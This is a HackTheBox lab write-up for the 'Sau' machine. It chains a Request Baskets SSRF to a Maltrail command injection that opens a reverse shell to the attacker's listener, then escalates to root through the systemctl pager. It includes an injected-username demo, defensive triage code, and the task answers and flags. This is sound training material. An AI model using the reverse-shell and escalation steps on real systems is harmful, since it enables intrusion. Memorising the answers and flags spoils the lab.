niccolò@home:~$

HackTheBox - Sau

Field         Details
OS            Linux
Difficulty    Easy
Release Date  2023-07-08
Pwned Date    2026-04-25
Tags          Shell Escape, Sudo Misconfiguration, Unauthenticated OS Command Injection, Server-Side Request Forgery

Summary

Sau is an Easy difficulty Linux machine that hosts a Request Baskets instance vulnerable to Server-Side Request Forgery (SSRF), CVE-2023-27163. The SSRF is used to reach a Maltrail instance listening only on internal ports; that Maltrail version is vulnerable to unauthenticated OS command injection, which yields a reverse shell as an unprivileged user. A sudo misconfiguration (passwordless `systemctl status`) is then exploited through the pager to obtain a root shell.

Reconnaissance

Port Scan

Starting with a general scan of all TCP ports

nmap -p- --min-rate 5000 -oN all_tcp_ports.txt 10.129.26.47
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Task 1: Which is the highest open TCP port on the target machine? 55555

Continuing with a more thorough scan of the detected ports

nmap -sC -sV -p 22,80,8338,55555 -oN service_scan.txt 10.129.26.47
  • -sC : run default scripts
  • -sV : service version detection
[snip]
55555/tcp open     http    Golang net/http server
| http-title: Request Baskets

Request Baskets is an open-source tool written in Go designed to catch and inspect HTTP requests.

nmap did not identify the version of the service, but browsing to http://10.129.26.47:55555 and inspecting the page reveals the version in the footer:

Powered by request-baskets | Version: 1.2.1

Task 2: What is the name of the open source software that the application on 55555 is “powered by”? request-baskets

Searching for known vulnerabilities in this version turns up a Server-Side Request Forgery (CVE-2023-27163). A proof of concept is available at https://packetstorm.news/files/id/174128

Task 3: What is the version of request-baskets running on Sau? 1.2.1

Task 4: What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets? CVE-2023-27163

Foothold

Exploit SSRF to expose filtered ports

Using packetstorm’s PoC

./exploit.sh <URL> <TARGET>
  • <URL>: the URL of the vulnerable request-baskets instance
  • <TARGET>: the URL we want the server to request on our behalf

The script creates a basket whose forward_url points at the target and enables proxy_response, so every request sent to the basket is forwarded by the server to the target and the target's response is returned to us. Pointing the target at 127.0.0.1 and the ports nmap reported as filtered makes those services reachable from the outside.

./exploit.sh http://10.129.26.47:55555 http://127.0.0.1:80
Creating the "mtfbhg" proxy basket...
Basket created!
Accessing http://10.129.26.47:55555/mtfbhg now makes the server request to http://127.0.0.1:80.
Response body (Authorization): {"token":"vthfCj1VuNagiIDj0FbVkhFWDDDL7CM0SyoqyjUGFEIC"}

Browsing to the created basket gives access to the service running on port 80, which is Maltrail v0.53. Maltrail is an open-source malicious traffic detection system.

Running the script against port 8338 has a similar result: a Maltrail service is listening on that port too.

Task 5: What is the name of the software that the application running on port 80 is “powered by”? Maltrail

Exploit command injection vulnerability to get reverse shell

Searching for known Maltrail vulnerabilities: https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py

Maltrail v0.53 suffers from an unauthenticated command injection on the /login endpoint: the username parameter of the POST request is interpolated unsanitised into a shell command that logs the login attempt (the "Failed password for ... from ... port ..." lines that show up in the journal later on), so shell metacharacters in the username are executed by the server. The exploit uses this to establish a reverse shell.

Task 6: There is an unauthenticated command injection vulnerability in Maltrail v0.53. What is the relative path on the webserver targeted by this exploit? /login
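The injection pattern in miniature, as an added example (it is not Maltrail's source and not part of the original writeup): a username is interpolated into a shell command string and run with shell=True, next to the hardened version that passes an argument vector to the logging program. `echo` stands in for `logger` so the block runs anywhere, and the message format follows the "Failed password for <user> from <ip> port <port>" journal line shown later in the writeup. The payload is constructed; the point it makes is that double quotes around the username do not help, because command substitution (and backticks, as in the public exploit) still runs inside them.

```python
"""Vulnerable vs hardened logging of a failed login (constructed model)."""
import re
import subprocess

# Constructed attacker-controlled username. Inside the double quotes the
# vulnerable command wraps it in, $(...) is still expanded by /bin/sh.
INJECTED_USERNAME = "$(echo INJECTED)"

# Cheap detection check for the username field of such log lines.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")


def log_failed_login_vulnerable(username: str, ip: str, port: int) -> str:
    """Command built by string formatting and executed through /bin/sh.

    Returns what the logging command printed; with INJECTED_USERNAME the
    attacker's command runs and its output ends up in the message.
    """
    cmd = 'echo "Failed password for %s from %s port %d"' % (username, ip, port)
    return subprocess.check_output(cmd, shell=True, text=True).strip()


def log_failed_login_hardened(username: str, ip: str, port: int) -> str:
    """Same message, passed as one argv element: no shell, no expansion."""
    msg = "Failed password for %s from %s port %d" % (username, ip, port)
    return subprocess.check_output(["echo", msg], text=True).strip()


def looks_like_shell_injection(username: str) -> bool:
    """True when the username carries shell metacharacters (detection aid)."""
    return bool(SHELL_META.search(username))


if __name__ == "__main__":
    print("vulnerable:", log_failed_login_vulnerable(INJECTED_USERNAME, "127.0.0.1", 45842))
    print("hardened:  ", log_failed_login_hardened(INJECTED_USERNAME, "127.0.0.1", 45842))
    print("flagged:   ", looks_like_shell_injection(INJECTED_USERNAME))
```

The vulnerable variant prints "Failed password for INJECTED from ..." because the shell ran the substituted command; the hardened variant prints the payload literally. The regex is a triage aid for log review, not a sanitiser: the fix is to stop handing user input to a shell at all.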

Listening on the attacking machine for incoming connections

nc -lvnp 4444

Running maltrail exploit

python maltrail_exploit.py 10.10.14.50 4444 http://10.129.26.47:55555/mtfbhg
  • 10.10.14.50: attacker’s ip
  • 4444: port where the attacker is listening
  • http://10.129.26.47:55555/mtfbhg: url to basket that allow access to maltrail

A connection is received on the listening port

connect to [10.10.14.50] from (UNKNOWN) [10.129.26.47] 45842
$ whoami
puma

The reverse shell runs as the user 'puma', the account Maltrail is running under.

Task 7: What system user is the Maltrail application running as on Sau? puma

cat /home/puma/user.txt

USER FLAG: 233eeab040d7ce6026f98acdebfadbf9

Privilege Escalation

Enumeration

Checking sudo permissions

sudo -l
[snip]
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

User puma can run /usr/bin/systemctl status trail.service as root through sudo without supplying a password.

Escalation via pager

When its standard output is a terminal, systemctl pipes its output through a pager (less by default, chosen via $SYSTEMD_PAGER or $PAGER). systemd sets LESS=FRSXMK if LESS is unset, and the F flag makes less exit immediately when the output fits on one screen, which is why the output has to be longer than the terminal for the pager to stay open. Since sudo ran systemctl as root, the pager it spawns also runs as root, and less's '!' command executes a shell command unless less is in secure mode (LESSSECURE=1), which this systemd version does not set.

Shrink the terminal window so that the output no longer fits on one screen, then run

sudo /usr/bin/systemctl status trail.service
[snip]
Apr 24 14:07:19 sau systemd[1]: Started Maltrail. Server of malicious traffic d>
Apr 25 11:44:42 sau maltrail[2844]: Failed password for None from 127.0.0.1 por>
Apr 25 13:59:38 sau sudo[2987]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=ro>
Apr 25 14:02:47 sau sudo[2989]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=ro>
lines 1-23

At the less prompt (the "lines 1-23" status line), typing !/bin/sh spawns a shell: '!' tells less to execute a shell command, and because less is running as root, so is the resulting shell.

Task 9: What is the full path to the binary (without arguments) the puma user can run as root on Sau? /usr/bin/systemctl

systemctl --version
systemd 245 (245.4-4ubuntu3.22)

Task 10: What is the full version string for the instance of systemd installed on Sau? systemd 245 (245.4-4ubuntu3.22)

Task 11: What is the 2023 CVE ID for a local privilege escalation vulnerability in this version of systemd? CVE-2023-26604
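A triage check for this escalation path, as an added example that is not from the writeup's author: it parses the text of `sudo -l` and `systemctl --version` and reports whether the pager escape is plausible. The samples are constructed from the outputs shown above (the `sudo -l` header line and the safe rule are mine). The 247 threshold is the systemd release that added the CVE-2023-26604 fix, which puts less into secure mode (LESSSECURE=1) when systemd is invoked under sudo, so '!' no longer runs a shell. The check is a heuristic: actually triggering it still needs a TTY and output longer than one screen.

```python
"""Triage: is a sudo 'systemctl status' rule exploitable via the pager?"""
import re
from typing import Dict, List, Optional

# Constructed sample: the rule line matches the writeup, the header line is
# standard `sudo -l` wording.
SUDO_L_SAMPLE = """User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
"""

# Constructed safe counterpart: --no-pager means systemctl never spawns less.
SAFE_SUDO_L_SAMPLE = """User puma may run the following commands on sau:
    (root) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
"""

# First line of `systemctl --version` as shown in the writeup.
SYSTEMCTL_VERSION_SAMPLE = "systemd 245 (245.4-4ubuntu3.22)"

# systemd release that started setting LESSSECURE=1 under sudo (CVE-2023-26604 fix).
SECURE_PAGER_SINCE = 247

# "(runas) TAG: TAG: /path/to/command args" as printed by sudo -l.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")


def systemd_major(version_output: str) -> Optional[int]:
    """Extract the major version from `systemctl --version` output."""
    m = re.match(r"systemd\s+(\d+)", version_output.strip())
    return int(m.group(1)) if m else None


def pager_escape_rules(sudo_l_output: str) -> List[Dict[str, object]]:
    """Return sudo rules that run `systemctl status` as root with a pager."""
    found = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.group("runas"), m.group("tags"), m.group("cmd")
        argv = cmd.split()
        if argv[0].rsplit("/", 1)[-1] != "systemctl":
            continue
        if "status" not in argv[1:] or "--no-pager" in argv:
            continue
        # "(ALL : ALL)" or "(root)" lets the caller choose root as the target user.
        runas_user = runas.split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        found.append({"command": cmd, "nopasswd": "NOPASSWD" in tags})
    return found


def assess(sudo_l_output: str, version_output: str) -> Dict[str, object]:
    """Combine the rule check with the systemd version check."""
    rules = pager_escape_rules(sudo_l_output)
    major = systemd_major(version_output)
    secure_pager = major is not None and major >= SECURE_PAGER_SINCE
    return {
        "rules": rules,
        "systemd_major": major,
        "secure_pager_by_default": secure_pager,
        # Heuristic: a matching rule on a systemd that does not lock down less.
        "likely_exploitable": bool(rules) and major is not None and not secure_pager,
    }


if __name__ == "__main__":
    print(assess(SUDO_L_SAMPLE, SYSTEMCTL_VERSION_SAMPLE))
    print(assess(SAFE_SUDO_L_SAMPLE, SYSTEMCTL_VERSION_SAMPLE))
```

From the defender's side the same check points at the two fixes: upgrade systemd past the threshold, or write the sudoers rule with `--no-pager` so systemctl never hands its output to less in the first place.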

cat /root/root.txt

ROOT FLAG: bf908f89925be1fa26abb2c1a6175675